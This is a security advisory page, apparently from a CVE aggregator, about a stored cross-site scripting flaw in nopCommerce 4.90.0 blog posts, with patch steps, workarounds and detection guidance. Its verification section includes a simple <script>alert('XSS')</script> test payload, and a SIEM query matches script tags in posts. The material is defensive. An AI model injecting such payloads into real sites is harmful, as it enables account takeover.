CVE-2025-65590 – nopCommerce 4.90.0 contains a stored cross-site... (How to Fix)

Q: What is the severity of CVE-2025-65590?

CVE-2025-65590 has a CVSS score of 5.4 (MEDIUM). nopCommerce 4.90.0 contains a stored cross-site scripting vulnerability in the blog posts functionality of its content management system. Attackers can inject malicious scripts that execute when administrators view blog posts, potentially compromising administrative accounts. This affects all nopCommerce 4.90.0 installations using the blog functionality.

📋 TL;DR

nopCommerce 4.90.0 contains a stored cross-site scripting vulnerability in the blog posts functionality of its content management system. Attackers can inject malicious scripts that execute when administrators view blog posts, potentially compromising administrative accounts. This affects all nopCommerce 4.90.0 installations using the blog functionality.

💻 Affected Systems

Products:

nopCommerce

Versions: 4.90.0

Operating Systems: All

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects installations with blog functionality enabled in the content management area.

📦 What is this software?

Nopcommerce by Nopcommerce

View all CVEs affecting Nopcommerce →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Administrator account takeover leading to full e-commerce site compromise, data theft, and malware distribution to customers.

🟠

Likely Case

Session hijacking of administrative users, defacement of blog content, or credential theft.

🟢

If Mitigated

Limited to blog content defacement if administrative accounts have strong authentication and session management.

🌐 Internet-Facing: MEDIUM

🏢 Internal Only: LOW

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: LIKELY

Unauthenticated Exploit: ✅ No

Complexity: LOW

Exploitation requires access to create or edit blog posts, typically requiring at least contributor-level permissions.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 4.90.1 or later

Vendor Advisory: https://www.nopcommerce.com/

Restart Required: No

Instructions:

1. Backup your nopCommerce installation and database. 2. Download nopCommerce 4.90.1 or later from the official website. 3. Replace the affected files with the patched version. 4. Clear the application cache. 5. Test blog functionality.

🔧 Temporary Workarounds

Disable Blog Functionality

all

Temporarily disable the blog module to prevent exploitation while waiting to patch.

Navigate to Admin > Configuration > Plugins > Local plugins > Find 'Blog' plugin > Click 'Edit' > Set 'Is plugin active?' to No

Input Validation Filter

all

Implement server-side input validation for blog post content to strip or encode script tags.

Modify blog post handling code to sanitize HTML input using libraries like HtmlSanitizer or AntiXSS

🧯 If You Can't Patch

Restrict blog post creation/editing permissions to trusted administrators only.
Implement Content Security Policy (CSP) headers to restrict script execution from untrusted sources.

🔍 How to Verify

Check if Vulnerable:

Check if nopCommerce version is 4.90.0 and blog functionality is enabled. Attempt to create a blog post with <script>alert('XSS')</script> and see if it executes when viewed.

Check Version:

Check Admin > Configuration > System Information > nopCommerce version

Verify Fix Applied:

After patching, attempt the same XSS payload in blog posts and verify it's properly sanitized or blocked.

📡 Detection & Monitoring

Log Indicators:

Unusual blog post creation/modification patterns
Administrative session anomalies after blog post views

Network Indicators:

Unexpected script loads from blog post URLs
Suspicious outbound connections from administrative sessions

SIEM Query:

source="nopcommerce" AND (event="blog_post_created" OR event="blog_post_modified") AND content CONTAINS "<script>"

📊 Metadata

CVE ID: CVE-2025-65590

CVSS v3 Score: 5.4 (MEDIUM)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

CWE: CWE-79

EPSS Score: 0.03% exploit probability (9.3th percentile)

Published: December 16, 2025

Last Updated: December 19, 2025

🔗 References

https://seclists.org/fulldisclosure/2025/Dec/17 Mailing List,Third Party Advisory
https://www.nopcommerce.com/ Product
http://seclists.org/fulldisclosure/2025/Dec/17 Mailing List,Third Party Advisory

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-65590, you might also want to check these: